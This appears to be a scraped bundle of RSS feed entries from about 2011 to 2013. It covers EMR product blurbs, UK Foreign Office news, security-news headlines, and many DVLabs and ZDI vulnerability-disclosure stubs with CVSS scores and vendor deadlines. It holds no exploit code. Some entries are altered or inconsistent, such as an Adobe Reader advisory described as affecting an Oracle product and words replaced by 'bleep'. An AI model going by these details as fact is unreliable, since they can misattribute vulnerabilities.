http://feeds.feedburner.com/Docucrunch?format=xml Allscripts MyWay combines electronic medical records (EMR) with practice management and claims management solutions. It is intended for smaller or solo practices that do not have IT staff or do not wish to spend a lot of money on EMRs. MyWay can also be integrated with an offices current practice management software. Currently, MyWay is [...]

==> NextGen: Patient Portal

http://feeds.feedburner.com/Docucrunch?format=xml The NextGen Patient Portal is a Web-based electronic health record (EHR) system that allows patients to be more proactive about their health and physician visits. It also is intended to help busy medical offices, especially smaller practices, cut down on administrative tasks, increase revenue, and provide better quality of care. The Patient Portal is integrated [...]

==> McKesson: Medisoft Clinical

http://feeds.feedburner.com/Docucrunch?format=xml McKessons Medisoft Clinical software is a combination of both a practice management (via the Medisoft version 17 system) and electronic medical record (EMR) solution. It is intended for small practices with some limited staff that have a need to reduce time-consuming administrative tasks and still provide quality care to patients. Having recently received the Certification [...]

==> TPTI-12-05 - Oracle AutoVue ActiveX SetMarkupMode Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-06 - Hewlett-Packard Data Protector DtbClsAddObject Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-04 - Samba NDR PULL EVENTLOG ReportEventAndSourceW Heap Overflow Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-03 - Adobe Reader X True Type Font MINDEX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of an Oracle product.

==> TPTI-12-02 - Novell iPrint Client ActiveX GetPrinterURLList2 Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-01 - Oracle Java True Type Font IDEF Opcode Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-15 - Novell ZENWorks Software Packaging ISGrid.Grid2.1 bstrSearchText Parameter Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENWorks. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-14 - Adobe Shockwave DEMX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-13 - McAfee SaaS myCIOScn.dll Scan Method Script Injection Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> TPTI-11-12 - McAfee SaaS MyAsUtil5.2.0.603.dll SecureObjectFactory Instantiation Design Flaw Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> Our website is moving

http://feeds.feedburner.com/FcoLatestNewsRssFeed GOV.UK We will be publishing our information, news and priorities on the new UK government platform GOV.UK.

==> Foreign Office website moved to GOV.UK

http://feeds.feedburner.com/FcoLatestNewsRssFeed GOV.UK The Foreign Office is publishing its news and policy on GOV.UK, the new place to find government information.

==> Minister for Europe renews UK commitment to EU enlargement

http://feeds.feedburner.com/FcoLatestNewsRssFeed Crown Copyright Minister for Europe David Lidington has set out the UK’s continued commitment to EU enlargement following his participation in the General Affairs Council meeting in Brussels on 11 December.

==> North Korean Ambassador summoned to Foreign and Commonwealth Office

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign & Commonwealth Office, Crown Copyright The North Korean Ambassador in London was summoned by the Permanent Under Secretary of State at the Foreign Office following news of the launch of a satellite by North Korea earlier today.

==> Championing Britain through commercial and economic diplomacy

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary (crown copyright) Foreign Secretary William Hague tells British diplomats they must intensify work to champion the UK as a destination for foreign investment.

==> Foreign Secretary remarks at the Friends of Syria meeting

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague | Crown Copyright The Foreign Secretary William Hague has outlined the immediate responsibilities for the Friends of Syria at the meeting in Marrakesh.

==> Government publishes Afghanistan progress report

http://feeds.feedburner.com/FcoLatestNewsRssFeed Afghan tribesmen take part in celebrations for the solar-based New Year's or Nowruz. GettyImages The Foreign Secretary William Hague has updated parliament on progress in Afghanistan during October 2012

==> Parental bleep Abduction is a worldwide problem

http://feeds.feedburner.com/FcoLatestNewsRssFeed bleep Abduction New figures reveal that the number of parental bleep abduction cases dealt with by the Foreign Office has risen by 88% in just under a decade.

==> Foreign Secretary condemns DPRK’s satellite launch

http://feeds.feedburner.com/FcoLatestNewsRssFeed Commenting on the launch of DPRK’s satellite, the Foreign Secretary, William Hague said:

==> UK calls for an immediate return to civilian rule in Mali

http://feeds.feedburner.com/FcoLatestNewsRssFeed Mark Simmonds Foreign Office Minister for Africa Mark Simmonds has tonight underlined his concern over the situation in Mali and called for an immediate return to civilian rule.

==> Obama, Verizon, NSA sued for collecting U.S. citizens' phone call data

http://feeds.feedburner.com/HelpNetSecurity Three individuals have filed the first lawsuit aimed at disputing the constitutionality of NSA's collection of metadata on phone calls made by or to U.S. citizens. Larry Klayman, American attorney ...

==> Reactions from the security community to the NSA spying scandal

http://feeds.feedburner.com/HelpNetSecurity Last week a whistleblower created quite the stir when he leaked documents about PRISM, a surveiilance program by the NSA. Below are comments on this scandal that Help Net Security received from a v...

==> Most enterprises have no information strategy

http://feeds.feedburner.com/HelpNetSecurity Less than 10 percent of todays enterprises have a true information strategy, according to Gartner, Inc. Recent research by Gartner has found that, just as business model thinking wasn't mainstream or...

==> ACLU asks spy court to release records on Patriot Act surveillance powers

http://feeds.feedburner.com/HelpNetSecurity The American Civil Liberties Union (ACLU) of Washington and Yale Law School's Media Freedom and Information Clinic filed a motion on Monday with the secret court that oversees government surveillance ...

==> IT consumerization still a threat

http://feeds.feedburner.com/HelpNetSecurity Despite the growing consumerisation of IT, the majority (63 per cent) of employees in the UK say that corporate IT is failing to secure all personal devices brought into the business, according to App...

==> Washington Free Beacon website redirects to malware

http://feeds.feedburner.com/HelpNetSecurity A "big" story like that regarding NSA spying was bound to be used by cyber crooks as a lure. So far, no emails containing links to booby-trapped pages or malicious attachments have been spotted, but I...

==> Researchers find self-propagating Zeus variant

http://feeds.feedburner.com/HelpNetSecurity The Zeus / Zbot Trojan has been around since 2007, and it and its variants continued to perform MitM attacks, log keystrokes and grab information entered in online forms. It is usually spread vi...

==> How businesses prepare for disasters

http://feeds.feedburner.com/HelpNetSecurity With fears of potential security breaches and natural disasters like Superstorm Sandy and the recent Oklahoma tornado weighing heavily on IT executives, businesses nationwide have continued to grow an...

==> Big data is a big priority

http://feeds.feedburner.com/HelpNetSecurity NGDATA shared the results of their survey executed in co-operation with Clear2Pay sharing insights from 183 global bankers around issues like the monetization of mobile payments and the value and re...

==> Mobile application reputation service from Veracode

http://feeds.feedburner.com/HelpNetSecurity Veracode is expanding upon its enterprise application security services to include mobile application intelligence. The introduction of Mobile Application Reputation Service (MARS) will help enterpris...

==> QualysGuard Private Cloud Platform on VCE Vblock Systems

http://feeds.feedburner.com/HelpNetSecurity Qualys announced that the QualysGuard Private Cloud Platform has been integrated with VCE Vblock Systems, helping them secure their networks from cyber attacks and automate compliance. Vblock Syste...

==> Cyber threat hunting service from Dell SecureWorks

http://feeds.feedburner.com/HelpNetSecurity Dell SecureWorks has launched a new Targeted Threat Hunting service aimed at finding cyber attackers who might be lurking in an organizations network, intent on committing a breach. Using cyber ...

==> OS X Mavericks to have 200+ new features

http://feeds.feedburner.com/HelpNetSecurity Apple today released a developer preview of OS X Mavericks, the 10th major release of the worlds most advanced operating system. With more than 200 new features, OS X Mavericks brings Maps and i...

==> NSA whistleblower reveals himself, world reacts

http://feeds.feedburner.com/HelpNetSecurity This last week has been the most eventful one in infosec history since I can remember. An (at the time unnamed) whistleblower has rocked the world by disclosing documents that seemingly prove that ...

==> Event: OKTANE13

http://feeds.feedburner.com/HelpNetSecurity OKTANE13 is an identity, security and mobility event. Whether youre just getting started with cloud applications, evaluating a mobile strategy, building a hybrid enterprise IT, or looking to make you...

==> Potential privacy problems for companies accepting Bitcoins

http://feeds.feedburner.com/HelpNetSecurity Businesses accepting Bitcoin payments might want to consider the privacy implications that such an option creates for its customers and for themselves. As you may or may not now, in order to receiv...

==> Video with NSA whistleblower Edward Snowden

http://feeds.feedburner.com/HelpNetSecurity This video features an interview with Edward Snowden, the man behind the most significant intelligence leak in U.S. history. Copyright 2013 Praxis Films / Laura Poitras.

==> QualysGuard Express Lite released

http://feeds.feedburner.com/HelpNetSecurity Qualys announced QualysGuard Express Lite, a small business version of the companys suite of integrated security and compliance solutions. The new cloud offering delivers the full power of the Q...

==> Automating vendor risk management and certification processes

http://feeds.feedburner.com/HelpNetSecurity Qualys announced customizable questionnaires in its QualysGuard Cloud Platform and suite of integrated solutions for security and compliance. Businesses can use the new Questionnaire solution to centr...

==> EU to vote on stiffer penalties for hackers

http://feeds.feedburner.com/HelpNetSecurity Member states of the European Union might soon be creating new laws that will raise minimum prison sentences for convicted cyber attackers and botnet herders. Last week, the European Parliament ...

==> New expert-level cyber forensics certification

http://feeds.feedburner.com/HelpNetSecurity (ISC)2 has developed a new certification, the Certified Cyber Forensics Professional (CCFPSM), as the first global standard for assessing experienced digital forensics professionals' mastery and profe...

==> Dell adds identity to the classification of unstructured data

http://feeds.feedburner.com/HelpNetSecurity Dell Software released Dell Quest One Identity Manager Data Governance Edition Classification Module, the latest solution that adds identity to the classification of unstructured data. While ot...

==> Week in review: NSA spying scandal, EU net neutrality, and vulnerable smart TVs

http://feeds.feedburner.com/HelpNetSecurity Here's an overview of some of last week's most interesting news, reviews, articles and interviews: Google won't allow facial recognition on Glass Whether Google Glass ships out to regular users ...

==> Proposed bill will deny foreign hackers entry into the U.S.

http://feeds.feedburner.com/HelpNetSecurity A day before U.S. President's scheduled meeting with Chinese President Xi Jinping, a new act that aims to punish criminals engaging in cyber spying and theft on behalf of foreign governments has been ...

==> New Android Trojan is complex as Windows malware

http://feeds.feedburner.com/HelpNetSecurity Mobile (and especially Android) malware is on the rise and according to researchers from Kaspersky Lab, its complexity is also increasing. Case in point: Backdoor.AndroidOS.Obad.a. This newly di...

==> Google ups (some) bug bounties

http://feeds.feedburner.com/HelpNetSecurity Google has once again decided to raise the sums that researchers can earn by offering information about bugs in the company's web services and properties (YouTube, Blogger, Orkut, Google Search, and s...

==> Changes to the standard for PIN Transaction Security

http://feeds.feedburner.com/HelpNetSecurity Today the PCI Security Standards Council (PCI SSC) published version 4.0 of the PIN Transaction Security (PTS) Point of Interaction (POI) requirements. These requirements, along with the Hardware Secu...

==> Pirate Bay founder suspected of hacking police databases

http://feeds.feedburner.com/HelpNetSecurity Pirate Bay co-founder Gottfrid Svartholm, who has been extradited from Cambodia to Sweden to answer for allegedly hacking of Swedish IT company Logica and the Nordea bank mainframe has been named as s...

==> SANSFIRE 2011

http://feeds.feedburner.com/SansInstituteAtRiskAll?format=xml SANSFIRE 2011

==> ZDI-CAN-1908: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1905: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Brian Gorenc' and ' HP Zero Day Initiative' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release

==> ZDI-CAN-1895: Splunk

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) severity vulnerability discovered by 'CyberCrown Ltd.' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1894: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1884: Kaspersky

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'ZombiE' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1865: Splunk

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) severity vulnerability discovered by 'CyberCrown Ltd.' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1864: Splunk

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) severity vulnerability discovered by 'CyberCrown Ltd.' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1897: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1896: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1892: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Brian Gorenc' and ' HP Zero Day Initiative' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1885: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1870: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1869: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1866: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Brian Gorenc' and ' HP Zero Day Initiative' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1880: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1879: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'vulnazoid' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1878: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1860: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Tom Gallagher & Paul Bates' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1812: IBM, IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1666: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1852: VMWare, Inc.

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1851: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1850: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1834: ABB

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1832: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1802: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1780: WellinTech

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1553: WellinTech

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1552: WellinTech

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1853: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1849: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1846: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1845: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1844: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1831: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1830: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1821: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1820: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1813: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Mil3s beep' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1811: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1809: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1712: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'major_mk' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1710: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1751: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-03-22, 80 days ago. The vendor is given until 2013-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1750: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-03-22, 80 days ago. The vendor is given until 2013-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1748: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-03-22, 80 days ago. The vendor is given until 2013-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1795: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1790: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'Brett Gervasoni' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1787: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1784: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

